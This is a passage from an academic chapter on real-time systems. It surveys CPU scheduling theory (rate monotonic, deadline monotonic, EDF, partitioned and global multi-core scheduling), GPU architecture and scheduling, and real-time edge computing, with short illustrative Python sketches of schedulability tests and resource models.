critical task parameters such as deadline, worst-case amount of execution time that
the task will consume, worst-case amount of main memory required, the frequency
with which tasks will be released in the system, etc. Without this information a
priori, the RTOS will be unable to prioritize access to the hardware resources so
as to ensure that task deadlines are always met. Task specifications in the real-time
systems’ literature can be broadly classified into two categories: (1) periodic real-
time tasks in which the tasks are released into the system using a time-triggered
mechanism, so that their frequency of arrival in the system can be modelled
exactly using the notion of a time period (e.g. collision avoidance control system
in automotive), and (2) sporadic real-time tasks in which the tasks are released into
the system using an event-triggered mechanism, so that their frequency of arrival in
the system cannot be modelled exactly (e.g. anti-lock braking system in automotive
that is activated whenever the brakes are applied). To facilitate predictability, a
sporadic task is additionally specified with a minimum inter-arrival time indicating
the minimum separation between successive arrivals of the task. Each new arrival of
a task is denoted as a task instance in this chapter. Example periodic and sporadic
real-time tasks are illustrated in Fig. 1.
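These two task models can be captured in a few lines of Python. The sketch below uses the period and relative deadline of Fig. 1; the worst-case execution time and the extra sporadic delay are illustrative assumptions.

```python
import random
from dataclasses import dataclass

@dataclass
class Task:
    wcet: float       # worst-case execution time
    deadline: float   # relative deadline
    period: float     # period, or minimum inter-arrival time if sporadic
    sporadic: bool = False

def arrivals(task, horizon):
    """Yield (arrival time, absolute deadline) pairs for task instances."""
    t = 0.0
    while t < horizon:
        yield t, t + task.deadline
        # A sporadic instance may arrive any time after the minimum separation.
        t += task.period if not task.sporadic else task.period + random.uniform(0, 5)

periodic = Task(wcet=2, deadline=7, period=10)   # parameters as in Fig. 1
print(list(arrivals(periodic, 40)))
# arrivals at 0, 10, 20, 30 with absolute deadlines 7, 17, 27, 37
```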
In an RTOS, although deadline-based prioritization of all the hardware resources
is important, processor scheduling in particular is of prime concern and hence the
focus of a substantial body of literature. This is due to the central role of the
processor in ensuring that the instructions of a real-time task are executed within their deadlines.
Fig. 1 Illustrating periodic and sporadic real-time tasks. The blue arrows indicate arrival times
and the red arrows indicate absolute deadlines for task instances. The figure shows tasks with a
period or minimum inter-arrival time value of 10 units and relative deadline of 7 units. (a) Periodic
real-time task. (b) Sporadic real-time task
Real-Time CPU Scheduling
This section focuses on literature related to CPU scheduling problems in the context
of real-time systems. It first introduces key scheduling algorithms and corresponding
results for single-core CPUs, followed by the same for multi-core CPUs.
Scheduling on Single-Core CPUs
1. Under fixed-priority scheduling, each instance of a real-time task has the same
relative priority (higher or lower) when compared to any instance of another
task. In other words, priorities are fixed at the task level and do not change
from one instance of the task to another. The first algorithm introduced is called
the rate monotonic (RM) scheduler that prioritizes real-time tasks based on
the value of their period or minimum inter-arrival time; the smaller the period
or minimum inter-arrival time, the higher is the priority of the task (Liu and Layland 1973). A related algorithm, the deadline monotonic (DM) scheduler, instead assigns higher priorities to tasks with smaller relative deadlines. Under such fixed-priority schedulers, the response time of a task instance comprises two components: (1) the execution time of the task instance and (2) interference from higher-priority task instances, called waiting time.
time. Joseph and Pandya observed that, for fixed-priority schedulers on single-core
CPUs and a given real-time task, it is feasible to determine a fixed taskset release
pattern that maximizes the interference from higher-priority task instances. Based
on this observation, they developed an iterative closed-form equation to derive the
worst-case response time for tasks. The schedulability test then involves checking
that the worst-case response time of every task is no more than its deadline. This test
is exact, in that it is both necessary and sufficient to ensure that all task deadlines
are met. However, the runtime complexity of the test is pseudo-polynomial in the
size of the input specification, because it can be proportional to the task deadline
parameter. Alternatively, a polynomial-time sufficient schedulability test for RM
scheduler based on the condition that the total utilization (Utilization of any real-
time task is the ratio of its worst-case execution time to its period or minimum
inter-arrival time.) of the taskset is no more than a specific threshold value has
been proposed (Liu and Layland 1973). Finally, it has also been shown that DM
is an optimal fixed-priority scheduler, in the sense that if a taskset is schedulable
under any fixed-priority algorithm, then it is also schedulable under DM (Leung
and Whitehead 1982).
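The iterative worst-case response time computation can be sketched as follows in Python. Tasks are assumed to be listed in decreasing priority order (e.g. rate monotonic), and the taskset at the end is hypothetical.

```python
import math

def worst_case_response_time(i, tasks):
    """Iterative response-time analysis for fixed-priority single-core scheduling.
    tasks[j] = (wcet C_j, period or min inter-arrival T_j, deadline D_j),
    sorted by decreasing priority."""
    C, T, D = tasks[i]
    r = C
    while True:
        # Each higher-priority task j releases ceil(r / T_j) interfering instances.
        r_next = C + sum(math.ceil(r / Tj) * Cj for Cj, Tj, _ in tasks[:i])
        if r_next == r:
            return r            # fixed point reached: worst-case response time
        if r_next > D:
            return None         # response time exceeds deadline: test fails
        r = r_next

tasks = [(1, 4, 4), (2, 6, 6), (3, 12, 12)]   # rate-monotonic priority order
print([worst_case_response_time(i, tasks) for i in range(len(tasks))])
# [1, 3, 10]: every response time is within its deadline, so the taskset passes
```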
Liu and Layland (1973) (likewise Dertouzos 1974) have shown that the EDF scheduler is optimal for scheduling periodic (likewise sporadic) real-time tasks on single-core CPUs, in the sense that if a real-time taskset is schedulable by any algorithm then it is also schedulable under EDF. Thus, a simple polynomial-time schedulability test for
EDF is to check whether the total utilization of the taskset is no more than 1. It is
easy to see that any taskset whose total utilization exceeds 1 cannot be successfully
scheduled on a single-core CPU, i.e. not all task deadlines can be met. However, this
simple test is only applicable for tasksets in which each task’s relative deadline is
equal to its period or minimum inter-arrival time. For scenarios when this is not the
case, a demand bound function -based schedulability test for EDF schedulers has
been proposed (Baruah et al. 1990a,b). The demand bound function for a real-time
task is the maximum total demand that all the instances of that task would generate
in a given duration of time. The resulting test is exact; however, it has an exponential
runtime complexity in the general case.
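A sketch of the demand bound function and the simple EDF utilization test is given below; the task parameters are illustrative.

```python
import math

def dbf(C, T, D, t):
    """Demand bound function: maximum total demand of a task's instances that
    both arrive and have their deadlines within any interval of length t."""
    return max(0, math.floor((t - D) / T) + 1) * C

def edf_utilization_test(tasks):
    # Exact EDF test when each relative deadline equals the period (D == T):
    # schedulable if and only if total utilization is no more than 1.
    return sum(C / T for C, T in tasks) <= 1.0

print(dbf(C=2, T=10, D=7, t=17))                 # 2 instances fit -> demand 4
print(edf_utilization_test([(2, 10), (3, 10)]))  # 0.5 <= 1 -> schedulable
```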
Scheduling on Multi-core CPUs
Fig. 2 Illustration of the Dhall effect on a multi-core CPU. The figure shows two cores and three tasks: τ1 and τ2 with utilization ε and τ3 with utilization greater than 1 − ε. Due to the restriction that τ3 cannot be scheduled in parallel on both cores, it will miss its deadline
1. Under partitioned scheduling, real-time tasks are partitioned offline and mapped to individual processing cores, and single-core algorithms, such as those discussed in section “Scheduling on Single-Core CPUs”, are used to schedule them independently on each core. This significantly simplifies the scheduling problem because all the results from single-core scheduling can now be applied to this case (a first-fit mapping heuristic is sketched after this list). However, the task to core mapping problem is fundamentally hard, equivalent to the NP-complete multiple knapsack problem (Zhang and Geng 1998). Additionally, from a theoretical perspective, partitioned scheduling has a performance threshold at 50% (Oh and Bakker 1998). That is, there exist tasksets with a total utilization of approximately m/2 which cannot be scheduled on an m-core CPU by any partitioned scheduling algorithm. A simple example of such a taskset is shown in Fig. 3; each task has a utilization slightly more than 0.5.
Fig. 3 Illustration of the theoretical limit of partitioned scheduling algorithms. The figure shows an m-core CPU and a collection of m + 1 real-time tasks. Each task τi has a utilization slightly more than 0.5. As can be seen, the taskset cannot be successfully partitioned on the m-core CPU
2. Under global scheduling, a single scheduling algorithm manages the entire multi-
core CPU, and a task instance can be scheduled to run on any of the idle cores.
It is also possible that a task instance has to migrate from one core to another
while in the midst of its execution. This flexibility significantly enhances the
capabilities of such schedulers, and in particular, they do not have a performance
threshold as in the case of partitioned schedulers. However, this flexibility comes at a cost: task migrations are in general expensive operations, in that they can significantly increase the worst-case execution times of task instances.
This is because of task data in the private core-specific caches that are no longer
accessible when a task instance migrates to another core. This data now has to
be fetched again from lower-level shared caches or in some cases even the main
memory, thus increasing the execution time of task instances.
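As noted in item 1, the following Python sketch illustrates a simple first-fit-decreasing heuristic for the task-to-core mapping problem. It assumes EDF on each core, so a core remains feasible while its total utilization does not exceed 1; the utilization values are illustrative.

```python
def first_fit_partition(utilizations, num_cores):
    """Greedy first-fit-decreasing mapping of task utilizations onto cores."""
    cores = [0.0] * num_cores
    mapping = []
    for u in sorted(utilizations, reverse=True):   # largest tasks first
        for c in range(num_cores):
            if cores[c] + u <= 1.0:                # EDF feasibility per core
                cores[c] += u
                mapping.append((u, c))
                break
        else:
            return None  # no core can host this task: partitioning failed
    return mapping

# m + 1 tasks of utilization ~0.51 on m = 2 cores fail, mirroring Fig. 3.
print(first_fit_partition([0.51, 0.51, 0.51], 2))   # None
print(first_fit_partition([0.6, 0.4, 0.5, 0.3], 2)) # a feasible mapping
```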
Algorithms from section “Scheduling on Single-Core CPUs” such as RM, DM, EDF and LLF can also be used to schedule tasks on multi-core CPUs, both under partitioned
and global scheduling paradigms. Under the partitioned strategy, instances of the
algorithm will execute on each core and independently schedule the mapped tasks.
Under the global strategy, a single instance of the algorithm will execute on one of
the cores and simultaneously schedule tasks on all the cores. For example, under
RM global scheduling, at any time instant, m active task instances having the
lowest period values will be scheduled to run on a m-core CPU. Although all these
algorithms have been extensively studied in the literature (Davis and Burns 2011),
in general, their performance in terms of their ability to meet all task deadlines is
largely limited. This is especially so when their performance is compared to the
single-core CPU case.
Real-Time Scheduling for CPU-GPU Systems
While CPU systems are based on the single instruction single data paradigm (or
multiple instruction multiple data in the case of multi-core CPU systems) where one
execution unit operates on one piece of data at a time using a single instruction, such
a paradigm is not necessarily efficient at tackling embarrassingly parallel problems
such as those found in graphics processing applications. Embarrassingly parallel
problems are a class of computational problems that are easy to solve using a set of
parallel operations with little or no data dependency between the parallel computa-
tions. Graphics processing units (GPUs) allow the parallelization of computations
via the single instruction multiple thread (SIMT) parallel processing model (Vuduc
and Choi 2013). Under SIMT, the same operation is performed on data stored in
different locations of memory in parallel; each thread executes the same instruction,
but operates on different data. SIMT enables highly parallel computation without the
memory, space and power overhead of supporting completely independent compute
units like traditional multi-core CPU systems. Over time, GPUs have evolved to
support general purpose computational tasks as well. Such devices are referred to
as general purpose graphics processing units (GPGPUs), and they have been used
as accelerators for tasks such as computer vision, machine learning and database
query processing. Such tasks often appear in applications with real-time constraints;
however, GPUs’ SIMT architecture introduces some unique challenges to providing
real-time guarantees.
GPU Background
Early GPUs were designed specifically for graphics processing tasks and did not
support general purpose computation. Through the use of shaders, small programs
that are run on dedicated graphics hardware, early GPUs could calculate the values
for individual pixels on a display. Early shaders were inflexible and did not even
support looping operations; GPUs processed shaders in a fixed pipeline starting with
3D operations like vertex and geometry shaders, and ending with pixel shaders to set
the individual pixel values in the output frame buffer. Over time, however, shaders
gained more functionality and GPU execution units became capable of running more
general programs. Today, these small programs that run in parallel on a GPU are
referred to as kernels to distinguish them from shaders, which are solely designed
for graphical calculations.
Fig. 4 A prototypical GPU architecture. The names of the components and layout will vary
depending on the manufacturer. Some GPUs may contain additional cores dedicated to certain
operations and different caching and memory access schemes
As shown in Fig. 4, a GPU contains several streaming multiprocessors (SMs), analogous to AMD's compute units (CUs) or Intel's slices. SMs are capable of running instructions and
processing data independently of each other and have access to a large bank of
shared memory where the instructions and data for processing are stored. Any new
data coming from the host or data generated by the execution of a GPU kernel must
be deposited in this shared memory before it can be accessed by the host system
or SMs. Each SM contains its own pool of instruction memory and data memory,
which acts as a cache for the slower shared memory. Different manufacturers may
implement different caching schemes with additional levels of caches. Each SM
contains multiple EUs (referred to as CUDA cores on NVIDIA GPUs and stream
processors on AMD GPUs) which form the backbone of the SIMT architecture.
Each EU in an SM executes the same instruction simultaneously, but operates
on different addresses in data memory. This means, for instance, if a branch is
encountered in a set of instructions, the instructions for both branch conditions must
be executed on all EUs in sequence, with only the relevant EUs updating values in
memory for the currently executing branch. This also implies that during looping
operations, individual EUs are not freed if the loop terminates early for the data
they are processing; all EUs finish processing the set of instructions simultaneously.
While all the EUs in an SM must execute the same thread, multiple sets of threads
can be allocated to an SM and a warp scheduler is used to determine which set of
threads should be executing at any given time.
Some GPUs are integrated in the same package as a CPU to form a heterogeneous
system on a chip (SoC). Internally, these integrated GPUs (iGPUs) function similar
to discrete GPUs, but externally they have direct access to the same memory
as their host CPU. Figure 5 illustrates a prototypical example of the memory
sharing arrangement for an iGPU (Intel 2021), although the design details will vary
depending on the manufacturer. In this case both the GPU and CPU share access
to a last level cache (LLC), so there is no need to copy data and instructions before
launching kernels on the GPU. The LLC is kept coherent with main memory by a
memory controller. While this shared memory makes launching kernels on the GPU
faster, the extra layers of caching can make accurately predicting response times of
individual tasks a challenge.
Threading Model
From the application perspective, tasks are composed of kernels to be executed on
the GPU as well as the number of thread blocks and threads per block that need to
be executed. The execution time of a task is the time the GPU spends executing its
kernel’s instructions. The response time of the task is the total time spent from the
host dispatching a task instance to the GPU until the time the result is received by
the host. This includes the communication bus delay and the time the kernel spends
blocked by other task instances waiting to execute on the GPU.
When launching a kernel as a task instance, the number of threads as well as
the number of thread blocks to execute must be specified. Each thread executes the
same instructions, but operates on different data. For instance when performing an
operation between two vectors, the index of each element can be mapped to a thread.
When performing a vector addition, the same instruction (addition) is performed between the corresponding indices of both vectors.

Fig. 5 A prototypical integrated GPU architecture; the GPU and CPU share access to the same pool of memory

However, the number of threads
being executed simultaneously is limited by the resources on an SM. If a kernel is
launched with more threads than available resources, groups of threads of a fixed
size are executed in series until all the threads in a thread block have completed.
These groups of threads are called warps (also referred to as wavefronts in AMD
GPUs and subgroups in OpenCL). Synchronization between warps is required as
there is no guarantee of the order in which they will be scheduled on a given SM.
A set of threads forms a thread block. While threads within a block can
share memory, thread blocks cannot share memory among themselves. Most
GPU architectures have a limit on the maximum number of threads that can be
allocated to one block (e.g. 1024 threads per block in CUDA), which requires
tasks operating on large data to split operations between multiple thread blocks in
a process known as tiling. Additionally, blocks belonging to the same task cannot
be synchronized, so computations in one thread block cannot be dependent on the
results of computations in another thread block for the same task. When performing
parallel operations, there is a trade-off between launching a kernel with a large block
size and few blocks or small block size and many blocks. If the block size is small,
parallel threads will not take full advantage of all the EUs in an SM, and resources
will sit idle. A thread block can only be allocated to one SM, so launching a kernel as
one block with the maximum number of threads will also fail to take full advantage
of parallelism as the limit on the number of threads executing simultaneously will
be reached, while the remaining SMs sit idle.
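The block/warp decomposition just described can be sketched as follows. The warp size of 32 and the 1024-thread block limit reflect the CUDA figures mentioned in the text, while the helper itself and the element counts are illustrative assumptions.

```python
import math

def launch_geometry(n_elements, threads_per_block, warp_size=32,
                    max_threads_per_block=1024):
    """Grid/block decomposition for an element-wise kernel (e.g. vector add)."""
    assert threads_per_block <= max_threads_per_block
    blocks = math.ceil(n_elements / threads_per_block)   # tiling across blocks
    warps_per_block = math.ceil(threads_per_block / warp_size)
    return blocks, warps_per_block

# 1M-element vector add with 256-thread blocks (values are illustrative).
print(launch_geometry(1_000_000, 256))   # (3907, 8)

# A kernel would compute the global index of the element handled by a thread as:
# i = block_index * threads_per_block + thread_index
```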
Scheduling Tasks on a Single GPU
Several challenges arise when trying to schedule tasks on a single GPU in a real-time system. The first is dealing with resource allocation within a single SM. Tasks can also be partitioned upon release and scheduled for execution across the GPU's SMs, as shown in the Slate framework (Allen et al. 2019).
All the techniques described here rely on first identifying the execution char-
acteristics of a kernel on a given device offline. Without this knowledge the best
one can do is to allocate specific tasks to specific SMs. In particular, it is not just
the average response time characteristics that need to be known, but the worst-
case ones. This is especially true as two tasks can interact adversely with each
other depending on their location in memory and resource demands. One strategy
to determine this is to purposefully create “enemies” for a given task that seek to
maximize interference (Yandrofski et al. 2022).
Multi-GPU and CPU-GPU Scheduling
Not all real-time systems are limited to a single GPU. In such systems it is necessary to understand how to schedule a task set across multiple GPUs, given their unique characteristics.
Fig. 6 An example of a DAG. Different shaped vertices correspond to tasks that must be run on a
particular type of device. Edges indicate precedence constraints, while the tuple above each vertex
is in the format (task index, worst-case execution time)
Application Domains
GPUs appear in a number of computing domains and face real-time data processing
challenges in each one. The following sections analyse specific challenges in some
common application domains; however, this list is not exhaustive.
Graphics Processing
GPUs were originally designed for the task of graphics processing, which includes
calculating geometric transforms and pixel shading for the rendering of 3D graphics.
Examples of “soft” real-time tasks in this domain are multitasking windowing
systems and high-performance 3D graphics for video games. These tasks are
characterized by a need for low response times, but can still tolerate frame drops.
Dealing with fairness in multitasking graphics systems is one area where GPU task
scheduling is important (Kato et al. 2011b). Additionally, two applications may be
generating graphical output for the GPU to process and this data could be bursty, i.e.
task release times are aperiodic and arrive more frequently in some time intervals
than others. In some graphics systems, hard real-time deadlines are required (Zou
et al. 2023), for example, the instrument cluster of a vehicle. In such cases, graphical
tasks need to be divided across a GPU’s available SMs and schedulability analysis
must be performed to show that the workload is schedulable. There is also a trade-off
between being able to meet hard deadlines and maximizing the GPU’s throughput;
the schedule that maximizes throughput does not necessarily allow all tasks to meet
their deadlines. Some frameworks like TimeGraph (Kato et al. 2011b) try to give an application the best of both worlds by providing two operating modes that a system can dynamically switch between.
Cloud Systems
Offloading data processing to the cloud is used to increase operational efficiency
and remove the risks of maintaining local hardware for performance computation.
As GPUs can be used for massively parallel computations, it is natural to maintain
GPU clusters in a cloud environment, but such clusters introduce their own
challenges. Firstly, large computations require coordination between multiple GPUs
introducing the same scheduling problems as multi-GPU systems. Additionally,
in the cloud environment, multiple virtual machines (VMs) may be allocated to
share a single GPU. While it is possible to simply partition a GPU's resources in
time and space (parallel SMs), this can lead to severely underutilized hardware
if all running VMs are not using their allocations all the time. To improve upon
this scheme, oversubscription can be allowed (Yao et al. 2023), which allows a
VM to dynamically use more than its share of resources if conditions permit.
Additionally, interference between scheduled tasks on different VMs can lead to
deadline violations of other tasks, and frameworks have been proposed to deal
with this problem in the context of cloud GPUs (Xu et al. 2023). In the cloud, not
every problem requires hard real-time constraints. Sometimes guaranteeing quality
of service (QoS), a probabilistic measure of the availability of a resource, is enough.
While such systems do not need to meet every deadline, checks are still needed to
ensure that a given QoS can be maintained given the taskset allocated to a particular
GPU system.
Tools and Frameworks
While many scheduling techniques and analyses are applicable to GPUs in general, there are some caveats for different GPU hardware and software frameworks. The following section introduces some of the current mainstream frameworks and their applicability to real-time systems.
OpenCL
OpenCL is an API maintained by several manufacturers with a focus on portability across devices (AMD 2010). It supports GPUs from Intel, AMD, NVIDIA,
Qualcomm and others as well as field programmable gate array (FPGA) devices
as parallel compute units. In OpenCL terminology, a CU is roughly equivalent
to an SM, a processing element is roughly equivalent to an EU, and a subgroup
is equivalent to a warp. Like ROCm, OpenCL is also open source, but instead
emphasizes portability over performance on one particular platform.
Alternative Architectures
While so far this section focused on presenting the challenges of real-time schedul-
ing with a generic SIMT architecture, there are several variations on this architecture
that are worth mentioning, as they can also affect the real-time performance of a
CPU-GPU system.
Processing in Memory
A major challenge with all GPU architectures is the amount of time spent transferring data to and from memory. This is partly due to the physical distance of the
GPU computational units from the on-chip memory. Processing in memory (PIM)
attempts to solve this problem by placing low-power GPU cores physically close to
memory, so that they can operate with low delay on data stored in memory, while
a high-power GPU sits far from memory, but is capable of processing more data
in parallel at higher speeds (Pattnaik et al. 2016). If PIM becomes widely used,
it will face several challenges with regard to real-time performance. Firstly, tasks
need to be scheduled not only in time but also allocated to the low-power or high-
power cores. These task allocations may be dynamic, depending on the nature of
the system. Secondly, PIM seeks to reduce energy usage by placing cores physically
close to memory. Finding a schedule for a taskset that can minimize energy usage
while still meeting deadlines is equally important.
FPGAs as Accelerators
Another alternative to GPUs is to use FPGAs as accelerators for parallel tasks.
FPGAs allow a designer to create their own custom digital logic, which may be
better suited for certain real-time tasks than a generic GPU. Additionally, GPU
caching and memory access schemes make deterministic estimates of response
times very difficult, whereas on an FPGA, the system designer has full control over
these design attributes. In terms of real-time execution, OpenCL already provides
several execution modes unique to FPGA devices that can improve performance
under certain conditions (Jiang et al. 2020).
Real-Time Edge Computing Systems
Introduction to Edge Computing
Fig. 7 Various distributed computing architectures. (a) Sample distributed system. (b) Virtualization

A distributed system shares resources among devices in the network to jointly perform the computation at a much higher rate. The key characteristics of a distributed system include resource sharing,
scalability, concurrency, fault tolerance and heterogeneity. With the advent of
virtualization, a hardware abstraction process, distributed systems evolved into
high-performance heterogeneous servers. Virtualization refers to the process of
creating a virtual layer over the hardware platform to create multiple computing
instances (virtual machines) and execute them simultaneously on the same hardware
platform (host machine).
Advances in internet technology made task execution and storage on remote servers feasible with reasonable response times. This has led to
the development of cloud-based applications with service-level agreements that
guarantee a minimum quality of service. The resource allocation in conventional
cloud computing can broadly be classified as reservation-based and on-demand
provisioning. The resources are charged based on the hardware configuration
(CPUs, GPUs and memory), type of provisioning (reservation/on-demand) and
the duration of provisioning (hours/days) (Armbrust et al. 2009). The most common objective in cloud resource provisioning is cost and/or energy minimization. Cloud computing provides resource migration between servers and replication as load-balancing and fault-tolerance mechanisms, respectively. Fundamentally, the tasks in cloud computing transmit their data to a centralized server for execution. However, with the growing complexity and unprecedented scale of data from a multitude of distributed edge devices (sensors, Internet-of-Things (IoT) devices such as smart cameras, and medical devices), there is a tremendous burden on the network capabilities of the remote servers.
In order to address this concern, edge computing was introduced wherein the task
execution happens at the edge of the network. Performing the computation closer to
the devices minimizes the response time of tasks as the delay incurred in transmit-
ting the data to the servers is greatly reduced. For instance, modern applications
such as autonomous driving or industrial automation need to transmit huge amounts of raw data for processing. Such applications require efficient computation and
faster response times for reliable operation. Unlike conventional cloud servers, edge servers are located closer to the devices, which enables them to transmit and process the data at a faster and more reliable rate. By allowing storage and execution capabilities
closer to the end devices, edge computing improves the system performance and
also reduces the computation and bandwidth requirement of the devices. Moreover,
the latest 5G network can provide high-speed low-latency communication with
massive network capacity enabling near-real-time analysis and response for edge
devices. Thus, edge computing is an innate choice for designing modern real-time
applications.
The Edge Architecture
The edge resources are modelled as either a set of servers or a tiered network of
servers interconnected by a low-latency, large bandwidth and high-speed backhaul
network for data communication. Internally, the edge servers may be connected to cloud servers with larger resource capacities using a core network. Each edge server comprises an access point through which end devices within its coverage area can access it. A sample edge architecture is shown in Fig. 8.
Fig. 8 A tiered edge-cloud architecture. Response time and computation resources increase as one goes higher up

Computation Resources The edge servers may have multiple hardware resource types such as processors (both CPUs and GPUs), memories (RAM) and storage (HDDs and SSDs), or software services such as AI/ML modules, databases, etc. Depending on the nature of the application and the type of problem being addressed, the term “computation resource” may refer to any of these resources. For instance, the
most widely interpreted resource in this context is the virtual machine (VM) with a
certain configuration of processors, memory and storage. Applications may request
for a certain number of VMs with a specific configuration for a specified (sometimes
unspecified) duration of time. Some studies also abstract the computation resource
as processing cycles per second. Devices may send their (local) data, have it processed using the resources at the edge layer, and get the result (processed data) back.
Real-Time Edge Computing
The advent of ultra-reliable low-latency communication (URLLC) in 5G has made edge computing a reality for many real-time applications such as autonomous multi-agent systems, connected cars, digital twins, etc. To enable the deployment of such real-time systems on edge servers, the
OS used must manage the edge resources, both computation and communication,
more efficiently. Essentially, the OS must allocate resources such that the timing constraints of the tasks are adhered to. In addition, the OS must be capable of handling time synchronization of devices and servers to facilitate a correct schedule of operations. Owing to the wide variety of devices connected to the network,
ensuring connectivity and maintaining a synchronous notion of time is a challenging
task. Real-time edge computing typically involves three stages: (i) computation
offloading, (ii) resource provisioning and (iii) task scheduling. First, computation
offloading refers to the decision problem of whether to offload the task from the
end device to the edge servers or not. Second, resource provisioning refers to
the allocation problem of communication (bandwidth) and computation resources
(multiple-type resources). Finally, the task scheduling problem, similar to CPU scheduling, determines when to execute the task and on which server.
The following presents timing parameters widely adopted in real-time edge computing and the factors that constitute them. The execution time of an offloading task
depends on the amount of computation resource allocated to it on the edge server.
The execution time may also include any queuing delay due to the task buffers
implemented at these servers. The queuing delay is the waiting time experienced by
the task due to some pending tasks arrived ahead at the servers. The communication
time is the time required to transmit the data from one entity (device/server) to
another. It depends on the amount of bandwidth allocated to it and the size of
data to be transmitted. The communication time includes the delay incurred in the
transmission medium, due to several factors such as signal strength, noise level,
interference and distance. Since the servers are internally connected by a high-speed
network, the delay incurred in transferring the data between servers is much smaller
compared to the delay in transmitting the data from/to the end devices.
Timing Model Generally, it is assumed that each task (from the device) requests
edge resources for a certain duration of time and may have some timing constraints
associated with it. The response time of an offloading task is given by the
summation of execution time and communication time. The literature in real-time
edge computing focuses on one of the following two timing models:
• Constrained Deadline: The works that bound the response time of the task (hard
real-time tasks) are classified under this category.
• Response Time Minimization: The remaining works are categorized here. This
includes the body of work that minimizes the average task response time or
overall makespan. The makespan is defined as the largest task response time.
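The response-time model above can be summarized in a short Python sketch; all parameter values and helper names are illustrative assumptions.

```python
def response_time(data_bits, bandwidth_bps, cycles, alloc_cycles_per_s,
                  queuing_delay_s=0.0):
    """Response time of an offloaded task: communication + queuing + execution."""
    comm = data_bits / bandwidth_bps        # transmission time to the server
    execu = cycles / alloc_cycles_per_s     # depends on the allocated compute
    return comm + queuing_delay_s + execu

def meets_deadline(deadline_s, **kwargs):
    # Constrained-deadline model: bound the response time by the deadline.
    return response_time(**kwargs) <= deadline_s

# Hypothetical task: 1 Mb of data over 100 Mbps, 5e8 cycles on a 2 GHz share.
print(meets_deadline(0.5, data_bits=1e6, bandwidth_bps=1e8,
                     cycles=5e8, alloc_cycles_per_s=2e9))  # 0.26 s <= 0.5 s
```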
Contention Model
Edge resources, although abundant relative to the end devices, are in general constrained by capacity. When multiple tasks are hosted on an edge server, they contend with the other tasks co-hosted on the same server. Depending on the type of resource for which these tasks contend, the contention model of the edge server is broadly classified into:
1. Under no contention, the resources are assumed to be sufficiently provisioned for the tasks and the total resources allocated are lower than the capacity of the servers.
Works in this category mainly focus on the task offloading (Kao et al. 2017),
server provisioning (Chen and Xu 2019) and/or task scheduling problems (Guo
et al. 2017) with optimization objectives such as minimizing task response times
(Kao et al. 2017; Chen and Xu 2019) and device energy (Guo et al. 2017).
A greedy task replication strategy for fault tolerance and a multi-arm bandit
learning algorithm based on a probabilistic prediction of task response time
is proposed (Chen and Xu 2019). The server provisioning for tasks and task
scheduling problem is modelled as a collection of trees with end-to-end deadlines
and fixed offloading bandwidth (Guo et al. 2017).
2. Under computation contention, the tasks contend only for the computation
resources in general and it is usually bounded by the computation capacity of
the edge servers. Works in this category mainly focus on the server provisioning
and task scheduling problems with optimization objectives such as minimizing
the task response times (Dai et al. 2018; Ren et al. 2017), device energy
(Yaqub and Sorour 2018) and server energy (Chen et al. 2019). The joint task
offloading and server provisioning problem with fixed offloading bandwidth
for tasks is considered, where the offloading problem is solved using bipartite
graph-based rounding method and the provisioning problem is solved using
gradient descent method (Dai et al. 2018). The same problem is solved for
partial offloading using convex optimization (Ren et al. 2017). A priority-
based heuristic and bisection method for offloading decisions and Lagrangian
method for provisioning problem is considered in Yaqub and Sorour (2018). The
switching costs and energy loss trade-offs for server activations and deactivations
are solved using Vickrey auctions (Chen et al. 2019).
3. Under communication contention, the tasks contend only for the communication
resources in general and it is usually bounded by the bandwidth capacity of
the edge servers. Works in this category mainly focus on task offloading and
server/bandwidth provisioning problems with optimization objectives such as
minimizing server energy (Sun et al. 2017), device energy (Chen et al. 2015),
server usage costs and communication overhead (Yu et al. 2018). A probability
function for the task deadline misses is derived considering the bound on queuing
delay (Sun et al. 2017). The bandwidth is modelled as a function of interference
among tasks and the problem is modelled in a decentralized game-theoretic
framework and solved using potential games. The problem in Yu et al. (2018)
is formulated as a multi-commodity max-flow problem and solved.
4. Under computation and communication contention both the communication and
the computation resources are in general shared by the tasks, both of which
are bounded by their respective capacities. Works in this category mainly focus
on the task offloading, server provisioning and/or task scheduling problems
with optimization objectives such as minimizing task response times (Castellano
et al. 2019; Heydari et al. 2019; Jošilo and Dán 2019), makespan (Pang et al.
2017) and minimizing VM delays (Cziva et al. 2018). The task offloading
problem is formulated as a Markov decision process and actor-critic-based
reinforcement learning heuristic to learn the offloading decisions is also proposed.
The studies covered in this section are developed for a single-tier architecture comprising a set of servers. A similar set of studies targeting multi-tier architectures can be found in the literature.
Tiered Architecture
The edge-cloud architecture comprises a multi-layer set of servers interconnected
by a high-speed network. Depending on the assumed server architecture,
the dimension of the resource allocation problem changes. For instance, in the case
of computation offloading, the decision problem expands to consider whether to
offload at the edge layer or at the cloud layer. Besides the offloading of tasks from
the devices, there is also offloading of tasks from edge servers (lower tier) to
cloud servers (higher tier). Likewise, the resource provisioning and task scheduling
need to consider prominent factors such as server-to-server delay and migration
costs between servers. Generally, the multi-layer servers are implemented with task
buffers and adopt a service rate approach for handling task execution as opposed
to conventional resource provisioning due to the difference in resource type and
variation in execution time across the server layers. The following presents some
studies distinct to multi-tier architecture based on the contention model previously
defined.
The server provisioning problem on multi-tier architecture with both compu-
tation and communication contention is formulated as a pure integer non-linear
program (PINLP) and solved iteratively using a solver in Gao et al. (2019).
A lazy switch algorithm to control the task migration frequency between servers
is also proposed. Considering a no-contention and constrained-deadline model, a
singleton-weighted congestion game-based heuristic was developed to arrive at a
consensus on task allocation at the lower tier (Zhang and Wang 2019). A stochastic
Lyapunov optimization-based greedy heuristic is also considered to estimate task
response times and decide whether to provision the task on another server at the
higher tier. The task offloading and server provisioning problem is formulated as a
mixed integer non-linear program (MINLP), and a branch-and-bound algorithm
is designed to find an optimal solution and prune the search space (Vu et al. 2018).
The task scheduling problem with only computation contention is also formulated as
an MINLP. The response time is modelled using an M/M/1 queuing model, where
M stands for Markovian and 1 denotes a single server, and the optimization problem
is solved heuristically by decomposing it into sub-problems (Zeng et al.
2016). An online learning algorithm for joint task offloading and server provisioning
using multi-arm bandit with a parameterized regret bound is presented (Ouyang
et al. 2019). The server provisioning and task scheduling problem with a fixed
offloading bandwidth per task and fractional resource allocations is solved optimally
using convex optimization and branch-and-bound methods (Tong et al. 2016). For
the same problem, a decentralized solution is developed that selects the server with
the least increase in response time and schedules tasks using the shortest-remaining-computation-time-first
policy (Tan et al. 2017).
Model Parameters
Several factors contribute to the task response times in edge computing. The three
most explicitly used notions of time in edge computing are the execution time,
deadline and communication time. The execution time or resource reservation
time denotes the fixed duration of time required to execute the task (or use the
